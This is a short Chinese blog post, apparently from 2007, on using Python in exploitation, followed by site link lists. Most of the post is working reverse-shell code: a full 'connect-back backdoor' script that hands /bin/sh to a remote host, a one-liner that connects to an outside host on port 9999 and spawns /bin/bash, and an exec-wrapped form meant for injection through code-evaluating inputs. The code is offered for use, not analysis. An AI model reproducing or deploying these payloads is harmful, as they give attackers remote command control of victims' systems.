在漏洞利用Python代码真的很爽


Posted in Python onAugust 26, 2007

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006\n"
  print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------\n")
  s.send("----------------------------- By wofeiwo -----------------------------\n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';

注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

Python 相关文章推荐
python追加元素到列表的方法
Jul 28 Python
Python打包可执行文件的方法详解
Sep 19 Python
Python调用C++程序的方法详解
Jan 24 Python
Python 实现一行输入多个值的方法
Apr 21 Python
使用Python处理Excel表格的简单方法
Jun 07 Python
influx+grafana自定义python采集数据和一些坑的总结
Sep 17 Python
Python 3.3实现计算两个日期间隔秒数/天数的方法示例
Jan 07 Python
Django上线部署之IIS的配置方法
Aug 22 Python
django框架auth模块用法实例详解
Dec 10 Python
Python socket聊天脚本代码实例
Jan 02 Python
python中HTMLParser模块知识点总结
Jan 25 Python
Python 多线程处理任务实例
Nov 07 Python
python编程-将Python程序转化为可执行程序[整理]
Apr 09 #Python
python的几种开发工具介绍
Mar 07 #Python
王纯业的Python学习笔记 下载
Feb 10 #Python
一篇不错的Python入门教程
Feb 08 #Python
Python学习资料
Feb 08 #Python
Python完全新手教程
Feb 08 #Python
简明 Python 基础学习教程
Feb 08 #Python
You might like
怎样去阅读一份php源代码
2009/08/21 PHP
ThinkPHP采用模块和操作分析
2011/04/18 PHP
PHP url 加密解密函数代码
2011/08/26 PHP
php无限分类且支持输出树状图的详细介绍
2013/06/19 PHP
php格式化电话号码的方法
2015/04/24 PHP
利用php实现一周之内自动登录存储机制(cookie、session、localStorage)
2016/10/31 PHP
利用PHPExcel读取Excel的数据和导出数据到Excel
2017/05/12 PHP
扩展easyui.datagrid,添加数据loading遮罩效果代码
2010/11/02 Javascript
jQuery中on()方法用法实例
2015/01/19 Javascript
jquery实现勾选复选框触发事件给input赋值
2015/02/01 Javascript
jQuery实现点击后高亮背景固定显示的菜单效果【附demo源码下载】
2016/09/21 Javascript
微信小程序 支付后台java实现实例
2017/05/09 Javascript
JavaScript变量基本使用方法实例分析
2019/11/15 Javascript
Vue使用axios引起的后台session不同操作
2020/08/14 Javascript
Javascript var变量删除原理及实现
2020/08/26 Javascript
JavaScript实现复选框全选和取消全选
2020/11/20 Javascript
为Python的web框架编写前端模版的教程
2015/04/30 Python
Python 3中的yield from语法详解
2017/01/18 Python
详解python中 os._exit() 和 sys.exit(), exit(0)和exit(1) 的用法和区别
2017/06/23 Python
python读取LMDB中图像的方法
2018/07/02 Python
python pygame实现2048游戏
2018/11/20 Python
利用Django提供的ModelForm增删改数据的方法
2019/01/06 Python
python3利用Socket实现通信的方法示例
2019/05/06 Python
Python的条件锁与事件共享详解
2019/09/12 Python
Python 解析pymysql模块操作数据库的方法
2020/02/18 Python
Python开发之pip安装及使用方法详解
2020/02/21 Python
在Python 的线程中运行协程的方法
2020/02/24 Python
7款设计巧妙的css3飘带状3D立体效果的导航菜单和表单窗口
2013/02/04 HTML / CSS
个人素质的自我评价分享
2013/12/16 职场文书
完美主义个人的自我评价
2014/02/17 职场文书
党员干部承诺书范文
2014/03/25 职场文书
"9.18"国耻日演讲稿范文
2014/09/14 职场文书
公司委托书范本5篇
2014/09/20 职场文书
四风问题专项整治工作情况报告
2014/10/28 职场文书
小学老师对学生的评语
2014/12/29 职场文书
2015年党日活动总结范文
2015/03/25 职场文书